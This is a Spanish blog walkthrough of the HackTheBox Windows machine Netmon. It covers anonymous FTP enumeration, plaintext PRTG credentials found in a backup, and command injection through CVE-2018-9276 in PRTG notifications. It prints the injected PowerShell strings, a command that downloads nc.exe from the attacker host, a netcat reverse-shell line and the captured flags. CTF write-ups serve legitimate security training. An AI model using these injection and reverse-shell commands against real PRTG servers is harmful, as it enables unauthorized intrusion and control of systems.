---
layout: post
title: HTB Machine Walkthrough&#58 Netmon
author: 1v4n
image:
  feature: banners/header.jpg
tags: htb ctf seguridad
---

<font size="2"><i><strong>Nota del autor</strong>: Los conocimientos que os hemos intentado transmitir, están dirigidos a una práctica ética, si los usáis para prácticas no adecuadas ni en consonancia con la legislación seria únicamente responsabilidad vuestra o de vuestros tutores. No nos hacemos responsables del mal uso que se le pueda dar a las herramientas y habilidades que enseñemos.</i></font>


## {0x0} Introducción

Netmon es una máquina ubicada en [HackTheBox](https://www.hackthebox.eu/home/machines/profile/177) que debemos vulnerar para conseguir las flags de usuario (**user.txt**) y root (**root.txt**) creada por [mrb3n](https://www.hackthebox.eu/home/users/profile/2984) (miembro de equipo [GuidePointSecurity](https://www.hackthebox.eu/home/teams/profile/204)) basada en Windows OS, os mostraremos los pasos que hemos dado.

<img src="{{ site.url }}/assets/images/h4f/netmon/01.jpg" style="display: block; margin: 0 auto;">

<img src="{{ site.url }}/assets/images/h4f/netmon/02.jpg" style="display: block; margin: 0 auto;">

## {0x1} Reconocimiento

Antes de empezar `ifconfig` a nuestra máquina de pentesting Kali Linux comprobando la conexión con la VPN privada a través de `openvpn --config 1v4n.ovpn` asignándose la IP `10.10.14.192`. Y comenzamos descubriendo nuestra dirección IP con `ifconfig`.

<img src="{{ site.url }}/assets/images/h4f/netmon/03.jpg" style="display: block; margin: 0 auto;">

Y comprobamos que hay conexión con la máquina a vulnerar lanzado un `ping -c 3`.

<img src="{{ site.url }}/assets/images/h4f/netmon/04.jpg" style="display: block; margin: 0 auto;">

## {0x2} Escaneo

Realizamos un escaneo de puertos para comprobar los servicios que están abiertos y corriendo en la máquina a vulnerar con `nmap -A 10.10.10.152`.

<img src="{{ site.url }}/assets/images/h4f/netmon/05.jpg" style="display: block; margin: 0 auto;">

<img src="{{ site.url }}/assets/images/h4f/netmon/06.jpg" style="display: block; margin: 0 auto;">

Observamos abiertos los puertos con sus correspondientes servicios como el 21 ([ftp](https://es.wikipedia.org/wiki/Protocolo_de_transferencia_de_archivos)), 80 ([http](https://es.wikipedia.org/wiki/Protocolo_de_transferencia_de_hipertexto)), 135 ([msrpc](https://es.wikipedia.org/wiki/Modelo_de_Objetos_de_Componentes_Distribuidos)), 139 ([netbios-ssn](https://es.wikipedia.org/wiki/NetBIOS)) y 445 ([microsoft-ds](https://es.wikipedia.org/wiki/Server_Message_Block)) .

Detectamos la vulnerabilidad del servicio `MS ftpd` que nos permitirá loguearnos y listar directorios con las credenciales **anonymous:anonymous**

<img src="{{ site.url }}/assets/images/h4f/netmon/07.jpg" style="display: block; margin: 0 auto;">

Además tenemos el servicio `http(80)` abierto y corriendo a `Indy httpd 18.1.37.13946` servidor web del software [Paessler PRTG bandwidth monitor](https://www.es.paessler.com/prtg/history/prtg-18#18.1.37).

<img src="{{ site.url }}/assets/images/h4f/netmon/08.jpg" style="display: block; margin: 0 auto;">

Pasamos a configurar **/etc/hosts** añadiendo la línea **10.10.10.152 netmon.htb**.

<img src="{{ site.url }}/assets/images/h4f/netmon/09.jpg" style="display: block; margin: 0 auto;">

## {0x3} Enumeración

Exploramos los directorios más interesantes vía `ftp(21)` y nos encontramos con el comando `ls -la` directorios interesantes como **ProgramData**, **Windows** y **Users**.

<img src="{{ site.url }}/assets/images/h4f/netmon/10.jpg" style="display: block; margin: 0 auto;">

Descargamos con `get` del directorio de **C:\Windows** el archivo **restart.bat**, script que reinicia PRTG NM copiando el archivo **PRTG Configutation.dat** en el directorio **C:\ProgramData\Paessler\PRTG Network Monitor**.

<img src="{{ site.url }}/assets/images/h4f/netmon/11.jpg" style="display: block; margin: 0 auto;">

<img src="{{ site.url }}/assets/images/h4f/netmon/12.jpg" style="display: block; margin: 0 auto;">

[Paessler PRTG](https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data) se instala por defecto en **%programdata%\Paessler\PRTG Network Monitor**, donde almacena información como configuraciones y backups. Nos centraremos en los archivos **PRTG Configuration.*** que pueden contener información sobre usuarios.

<img src="{{ site.url }}/assets/images/h4f/netmon/13.jpg" style="display: block; margin: 0 auto;">

Observamos en el archivo de respaldo realizado en la fecha **07/14/2018** de la configuración **PRTG Configuration.dat.old.bak** datos de un usuario que almacena sin ningún tipo de cifrado con las credenciales **prtgadmin:PrTg@dmin2018** que no son válidas.

<img src="{{ site.url }}/assets/images/h4f/netmon/14.jpg" style="display: block; margin: 0 auto;">

Examinamos el directorio de **Users** y nos percatamos que no somos administradores pero que sí tenemos acceso a la carpeta **Public** donde tenemos ubicado el archivo **user.txt**.

<img src="{{ site.url }}/assets/images/h4f/netmon/15.jpg" style="display: block; margin: 0 auto;">

Nos centramos en el servicio `http (80)` enumerando directorios accesibles con la herramienta [Dirhunt](https://github.com/Nekmo/dirhunt) y [HTTPie](https://httpie.org/) obteniendo la información de la versión de PRTG que es **18.1.37.13946** con un sistema de autentificación por login y la cuenta **UA-154425-18** de Google Analytics.

<img src="{{ site.url }}/assets/images/h4f/netmon/16.jpg" style="display: block; margin: 0 auto;">

<img src="{{ site.url }}/assets/images/h4f/netmon/17.jpg" style="display: block; margin: 0 auto;">

PRTG NM en la máquina **Netmon** es vulnerable siempre que tengamos acceso a la consola web de administrador para explotar la vulnerabilidad de inyección de comandos del sistema operativo (RCE) [CVE-2018-9276](https://www.exploit-db.com/exploits/46527) y una denegación de servicio (DDoS) [CVE-2018-10253](https://www.exploit-db.com/exploits/44500)

Según la [información](https://kb.paessler.com/en/topic/433-what-s-the-login-name-and-password-for-the-prtg-web-interface-how-do-i-change-it) en PEASSLER probamos las credenciales por defecto en el login de la web de administración del PRTG NM (**prtgadmin:prtgadmin**) pero no son válidas.

<img src="{{ site.url }}/assets/images/h4f/netmon/18.jpg" style="display: block; margin: 0 auto;">

<img src="{{ site.url }}/assets/images/h4f/netmon/19.jpg" style="display: block; margin: 0 auto;">  

Retomando las credenciales encontradas en el archivo de respaldo realizado en el año 2018 de la configuración del PRTG, probamos otras credenciales siendo el usuario admin **prtgadmin** y el algoritmo de la contraseña **PrTg@dmin[Año]**. Conseguimos la credencial válida a la administración web con **prtgadmin:PrTg@dmin2019** ayudándonos de `BurpSuite > Repeater`.

<img src="{{ site.url }}/assets/images/h4f/netmon/20.jpg" style="display: block; margin: 0 auto;">

<img src="{{ site.url }}/assets/images/h4f/netmon/21.jpg" style="display: block; margin: 0 auto;">

## {0x4} Acceso

Accedemos con éxito a **/Users/Public/** y a través del comando `get` obtenemos **user.txt**.

<img src="{{ site.url }}/assets/images/h4f/netmon/22.jpg" style="display: block; margin: 0 auto;">

Y conseguimos tener acceso a **user.txt** > **dd58ce67b49e15105e88096c8d9255a5**.

**[!] Hash function : MD5 > 822722093**

<img src="{{ site.url }}/assets/images/h4f/netmon/23.jpg" style="display: block; margin: 0 auto;">

Pasamos a acceder a la administración web con las credenciales **prtgadmin:PrTg@dmin2019** en la URL **http://netmon.htb/public/login.html**.

<img src="{{ site.url }}/assets/images/h4f/netmon/24.jpg" style="display: block; margin: 0 auto;">

Ya autenticados nos movemos a `Setup > Notifications > Email and push notification to admin`.

<img src="{{ site.url }}/assets/images/h4f/netmon/25.jpg" style="display: block; margin: 0 auto;">

Activando la opción `Execute Program > Demo exe notification - outfile.ps1` > Ejecutamos un test introduciendo el siguiente script en `Parameter text.txt; mkdir c:\users\public\testing > Save > Send test Notification`.

<img src="{{ site.url }}/assets/images/h4f/netmon/26.jpg" style="display: block; margin: 0 auto;">

Comprobamos a través de `ftp (21)` que se crea el directorio **testing** en **C:\Users\Public** y confirmamos que la vulnerabilidad [CVE-2018-9276](https://www.exploit-db.com/exploits/46527) está activa.

<img src="{{ site.url }}/assets/images/h4f/netmon/27.jpg" style="display: block; margin: 0 auto;">

Decidimos volver a realizar un **script**, pero invocando al archivo **root.txt** que se encuentra ubicado en **C:\Administrator\Desktop**:

```
text.txt; Copy-item "C:\Users\Administrator\Desktop\root.txt" -Destination "C:\Users\Public\testing\1v4n.txt"
```

<img src="{{ site.url }}/assets/images/h4f/netmon/28.jpg" style="display: block; margin: 0 auto;">

Y ahí está **root.txt** > **3018977fb944bf1878f75b879fba67cc**

**[!] Hash function : MD5 > 196851845**

<img src="{{ site.url }}/assets/images/h4f/netmon/29.jpg" style="display: block; margin: 0 auto;">

## {0x5} Privesc

Aunque hemos obtenido las flags de **user.txt** y **root.txt**, a máquina Netmon la hemos comprometido pero no hemos podido tomar su control o realizar una **Escalada de Privilegios (Privesc)**. Y nos ponemos a ello.

<img src="{{ site.url }}/assets/images/h4f/netmon/30.jpg" style="display: block; margin: 0 auto;">

Hacemos un **script** invocando en Netmon a [nc.exe](https://eternallybored.org/misc/netcat/) (netcat) que hemos ubicado en un servidor web de la máquina atacante:

```
text.txt; powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.192:8080/nc.exe','C:\Users\Public\testing\nc.exe')"
```

Reubicamos en la máquina Netmon a `nc.exe` en el directorio de Administrator y lo ejecutamos:

```
text.txt; Copy-item "C:\Users\public\testing\nc.exe" -Destination "C:\Users\administrator\nc.exe"
```

```
test.txt; C:\users\administrator\desktop\nc.exe 10.10.14.192 4444 -e cmd.exe
```

<img src="{{ site.url }}/assets/images/h4f/netmon/31.jpg" style="display: block; margin: 0 auto;">

<img src="{{ site.url }}/assets/images/h4f/netmon/32.jpg" style="display: block; margin: 0 auto;">

<img src="{{ site.url }}/assets/images/h4f/netmon/33.jpg" style="display: block; margin: 0 auto;">

Conseguimos tomar el control y de nuevo ahí está **root.txt** > **3018977fb944bf1878f75b879fba67cc**

<img src="{{ site.url }}/assets/images/h4f/netmon/34.jpg" style="display: block; margin: 0 auto;">
